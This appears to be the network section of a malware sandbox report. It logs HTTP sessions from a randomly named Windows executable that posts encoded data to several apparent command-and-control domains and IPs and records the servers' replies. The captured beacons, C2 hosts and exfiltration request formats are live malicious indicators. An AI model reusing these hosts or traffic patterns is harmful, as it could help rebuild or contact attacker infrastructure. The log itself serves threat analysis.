                                                                                    Server: Apache
                                                                                    Content-Length: 774
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    13 | 192.168.11.30 | 49837 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:57.128612995 CET | 796 | OUT | POST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 44 71 4f 73 54 55 66 46 65 6a 79 37 35 43 77 54 35 41 39 45 73 5a 7a 53 70 32 59 68 49 71 6b 70 43 55 75 4c 76 33 65 2b 7a 61 6b 72 30 39 67 4f 34 35 49 72 4e 62 6c 48 6b 78 66 31 75 77 56 61 73 4c 45 58 52 49 4b 66 42 64 76 4b 59 63 72 47 37 7a 49 39 6d 44 55 49 76 4f 30 71 48 74 4c 38 45 6b 43 5a 56 77 4c 76 4f 4c 4c 2b 67 4f 50 51 37 44 6f 30 33 34 31 2b 6f 53 31 7a 31 78 6d 4d 75 57 47 42 77 4b 78 58 48 72 42 41 44 6f 65 50 6f 39 57 38 58 75 38 52 71 4d 57 38 71 2b 6b 69 51 37 4e 45 4b 71 36 34 51 64 75 31 2b 36 56 72 6e 63 57 42 4e 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0DqOsTUfFejy75CwT5A9EsZzSp2YhIqkpCUuLv3e+zakr09gO45IrNblHkxf1uwVasLEXRIKfBdvKYcrG7zI9mDUIvO0qHtL8EkCZVwLvOLL+gOPQ7Do0341+oS1z1xmMuWGBwKxXHrBADoePo9W8Xu8RqMW8q+kiQ7NEKq64Qdu1+6VrncWBNA==
                                                                                    Jan 9, 2025 16:54:58.140507936 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:54:57 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    14 | 192.168.11.30 | 49838 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:59.975334883 CET | 816 | OUT | POST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 51 70 43 78 53 4c 75 31 32 2b 32 61 6b 72 38 64 67 50 6c 70 49 77 4e 62 59 6b 6b 31 58 31 75 77 78 61 73 4b 30 58 52 2f 2b 59 48 4e 76 49 55 38 72 45 2f 7a 49 39 6d 44 55 49 76 50 51 41 48 74 44 38 44 55 79 5a 58 53 7a 73 52 37 4c 68 6a 4f 50 51 74 7a 6f 77 33 34 31 63 6f 58 73 57 31 7a 4f 4d 75 54 69 42 78 59 4a 49 4f 72 42 4b 4d 49 66 4c 6b 34 7a 70 62 4e 77 6c 71 71 61 59 72 73 59 49 63 4d 67 65 58 70 4f 36 44 39 53 59 69 37 34 44 6c 65 58 61 51 45 59 46 46 41 4c 71 46 34 76 45 6d 7a 64 31 4c 4c 46 4e 32 68 55 3d
                                                                                    Data Ascii: 6B-l7F=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYFFALqF4vEmzd1LLFN2hU=
                                                                                    Jan 9, 2025 16:55:00.987040997 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:00 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    15 | 192.168.11.30 | 49839 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:02.818437099 CET | 3933 | OUT | POST /nkmx/ HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.givvjn.info
                                                                                    Referer: http://www.givvjn.info/nkmx/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 78 2b 4d 70 6b 4f 42 78 72 78 49 4f 72 42 4b 4c 49 66 77 6b 34 33 6f 62 4e 70 35 71 76 6a 76 6f 63 73 49 66 34 35 71 54 59 54 74 61 75 36 61 6d 49 73 35 7a 74 33 30 4e 47 68 6e 55 53 57 61 54 34 44 4c 75 44 4a 33 61 65 70 61 74 68 30 68 61 30 63 73 51 39 63 4e 42 62 35 74 4b 4f 69 5a 64 46 61 48 76 74 4a 78 67 42 48 4e 62 75 4e 64 65 6e 4e 47 47 4d 70 51 49 61 39 6a 4f 74 33 73 73 75 78 49 5a 63 38 51 67 62 68 53 63 31 66 72 31 56 53 63 45 59 74 56 47 74 46 59 34 42 45 76 4a 75 52 37 6c 33 44 74 4e 6a 48 37 72 63 2f 58 4e 7a 50 72 72 30 71 34 52 43 4a 42 48 68 42 66 64 34 79 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:03.815161943 CET | 137 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:03 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    16 | 192.168.11.30 | 49840 | 47.83.1.90 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:05.659130096 CET | 534 | OUT | GET /nkmx/?6B-l7F=eUQnbnMYY/LCOqGDejL9TQzNqDkA9lUjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth/8fPOW7Uk3kTT+8ArA=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.givvjn.info
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:06.653471947 CET | 139 | IN | HTTP/1.1 567 unknown
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 09 Jan 2025 15:55:06 GMT
                                                                                    Content-Length: 17
                                                                                    Connection: close
                                                                                    Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65
                                                                                    Data Ascii: Request too large


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    17 | 192.168.11.30 | 49841 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:13.006392002 CET | 799 | OUT | POST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 34 32 2b 6b 6c 78 77 74 78 73 71 57 30 44 67 30 4e 2b 33 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys42+klxwtxsqW0Dg0N+3Hw==
                                                                                    Jan 9, 2025 16:55:13.143280983 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    18 | 192.168.11.30 | 49842 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:16.692215919 CET | 819 | OUT | POST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 48 45 46 46 36 4d 46 59 6a 58 53 62 6b 4f 76 37 61 38 64 45 3d
                                                                                    Data Ascii: 6B-l7F=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RHEFF6MFYjXSbkOv7a8dE=
                                                                                    Jan 9, 2025 16:55:16.828346014 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    19 | 192.168.11.30 | 49843 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:19.366292000 CET | 3936 | OUT | POST /t3iv/ HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.bonheur.tech
                                                                                    Referer: http://www.bonheur.tech/t3iv/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 67 4f 6b 54 6b 78 2f 47 7a 6a 35 35 49 55 76 34 73 6c 44 34 61 4f 31 64 6e 36 4b 2f 46 5a 56 58 6d 65 39 51 7a 37 4c 37 6d 46 78 30 6c 33 51 49 4a 30 32 2f 36 4e 33 45 45 4d 68 4b 46 6d 70 63 4b 33 51 66 54 7a 37 59 61 66 62 6a 6a 61 7a 7a 34 61 36 59 68 5a 2f 50 52 6c 33 70 35 70 34 51 65 59 36 34 31 76 32 5a 62 66 79 64 4a 31 64 66 32 72 73 69 46 63 58 42 6e 77 37 72 54 34 69 52 67 6b 77 71 42 57 38 45 73 77 4b 6f 6c 4d 6f 55 33 2f 6f 58 54 51 64 49 4f 61 68 4f 4c 52 45 2f 5a 58 5a 6d 69 6e 46 4c 30 73 50 54 6f 53 4f 33 44 65 42 75 73 4b 49 66 6a 48 71 30 74 5a 34 68 4a 45 61 [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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 [TRUNCATED]
                                                                                    Jan 9, 2025 16:55:19.503109932 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                    content-length: 0
                                                                                    connection: close


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    20 | 192.168.11.30 | 49844 | 13.248.169.48 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:22.034774065 CET | 535 | OUT | GET /t3iv/?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA= HTTP/1.1
                                                                                    Host: www.bonheur.tech
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:55:22.175661087 CET | 379 | IN | HTTP/1.1 200 OK
                                                                                    content-type: text/html
                                                                                    date: Thu, 09 Jan 2025 15:55:22 GMT
                                                                                    content-length: 258
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 30 6b 3d 6c 52 61 70 43 50 4d 58 67 44 6b 26 36 42 2d 6c 37 46 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 71 49 78 5a 2b 50 4c 61 34 73 58 54 59 57 41 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 43 4d 4d 71 6b 6e 47 34 79 64 77 4c 33 56 32 33 4f 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?80k=lRapCPMXgDk&6B-l7F=P136bSYw/boin6uqIxZ+PLa4sXTYWAHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2CMMqknG4ydwL3V23OA="}</script></head></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    21 | 192.168.11.30 | 49845 | 160.25.166.123 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:55:28.188802004 CET | 787 | OUT | POST /bwjl/ HTTP/1.1
                                                                                    Host: www.rpa.asia
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.rpa.asia
                                                                                    Referer: http://www.rpa.asia/bwjl/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 75 4a 41 67 47 4b 30 43 62 63 6f 34 57 76 37 4a 63 61 31 7a 41 3d 3d
                                                                                    Data Ascii: 6B-l7F=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BruJAgGK0Cbco4Wv7Jca1zA==
                                                                                    Jan 9, 2025 16:55:28.531186104 CET  1289               IN         HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Thu, 09 Jan 2025 15:55:28 GMT
                                                                                    server: LiteSpeed
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
